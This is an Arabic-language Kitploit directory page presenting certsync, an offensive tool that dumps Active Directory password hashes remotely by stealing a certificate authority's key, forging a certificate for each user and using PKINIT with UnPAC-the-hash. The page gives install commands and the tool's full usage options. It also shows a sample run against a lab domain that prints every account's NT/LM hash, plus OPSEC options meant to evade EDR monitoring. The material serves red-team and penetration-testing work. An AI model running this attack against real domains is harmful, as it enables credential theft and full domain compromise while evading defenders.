Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
certsync — تفريغ NTDS مع golden certificates وUnPAC الهاش | Kitploit
أدوات/GitHubGitHub/zblurx/certsync
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالاختبار الاختراقالمصادقةالفريق الأحمر
GitHubzblurx/certsync

certsync

تفريغ NTDS مع golden certificates وUnPAC الهاش

عرض المستودع
64968منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

certsync

certsync هي تقنية جديدة لتفريغ NTDS عن بُعد، ولكن هذه المرة بدون DRSUAPI: تستخدم golden certificate و UnPAC the hash. تعمل بعدة خطوات:

  1. تفريغ قائمة المستخدمين ومعلومات المرجع المصدق (CA) وقائمة الإبطال (CRL) من LDAP
  2. تفريغ شهادة CA والمفتاح الخاص
  3. تزوير شهادة لكل مستخدم دون اتصال
  4. فك تجزئة UnPAC لكل مستخدم للحصول على تجزئات nt و lm
root@kitploit:~
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

على عكس ما قد نعتقد، فإن الهجوم ليس أبطأ على الإطلاق.

جدول المحتويات

  • مزامنة الشهادات
    • جدول المحتويات
    • التثبيت
    • الاستخدام
    • لماذا
    • المتطلبات
    • القيود
    • OPSEC
    • الإشادات

التثبيت

محلياً:

root@kitploit:~
git clone https://github.com/zblurx/certsync
cd certsync
pip install .

من Pypi:

root@kitploit:~
pip install certsync

من BlackArch:

root@kitploit:~
pacman -S certsync

جميع حزم توزيعات أنظمة التشغيل:

Packaging status

الاستخدام

root@kitploit:~
$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username]
                [-p password] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver]
                [-dns-tcp] -dc-ip ip address [-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and UnPAC the hash

options:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -outputfile OUTPUTFILE
                        base output filename

CA options:
  -ca-pfx pfx/p12 file name
                        Path to CA certificate. If used, will skip backup of CA certificate and private key
  -ca-ip ip address     IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authentication options:
  -d domain.local, -domain domain.local
                        Domain name
  -u username, -username username
                        Username
  -p password, -password password
                        Password
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid
                        credentials cannot be found, it will use the ones specified in the command line
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)
  -kdcHost KDCHOST      FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
  -scheme ldap scheme
  -ns nameserver        Nameserver for DNS resolution
  -dns-tcp              Use TCP instead of UDP for DNS queries
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
  -ldap-filter LDAP_FILTER
                        ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
  -template cert.pfx    base template to use in order to forge certificates
  -timeout timeout      Timeout between PKINIT connection
  -jitter jitter        Jitter between PKINIT connection
  -randomize            Randomize certificate generation. Takes longer to generate all the certificates

لماذا

أصبح DRSUAPI أكثر مراقبة وأحيانًا مقيدًا من قبل حلول EDR. علاوة على ذلك، لا يتطلب certsync استخدام مسؤول مجال، بل يتطلب فقط مسؤول CA.

المتطلبات

يحتاج هذا الهجوم إلى:

  • وجود مرجع مصدق (Enterprise CA) مهيأ على خادم ADCS في المجال،
  • عمل PKINIT،
  • حساب مجال يكون مسؤولاً محلياً على خادم ADCS، أو تصدير شهادة CA والمفتاح الخاص.

القيود

نظرًا لأننا لا نستطيع استخدام PKINIT للمستخدمين الملغيين، فلا يمكننا تفريغ تجزئاتهم.

OPSEC

تمت إضافة بعض الخيارات لتخصيص سلوك الأداة:

  • -ldap-filter: تغيير مرشح LDAP المستخدم لاختيار أسماء المستخدمين إلى certsync.
  • -template: استخدام شهادة تم تسليمها بالفعل لتقليدها عند تزوير شهادات المستخدمين.
  • -timeout و -jitter: تغيير المهلة الزمنية بين طلبات مصادقة PKINIT.
  • -randomize: افتراضيًا، تحتوي جميع شهادات المستخدم المزورة على نفس المفتاح الخاص والرقم التسلسلي وتواريخ الصلاحية. ستعمل هذه المعلمة على عشوائيتها، لكن التزوير سيستغرق وقتًا أطول.

الإشادات

  • Olivier Lyak لجميع أعماله على ADCS و certipy.
  • Benjamin Delpy لتقنية فك تجزئة UnPAC.
  • Will Schroeder و Lee Christensen لـ Certified Pre-Owned و Certify.
  • Mayfly لمختبره الرائع: GOAD.
تنزيل الأداة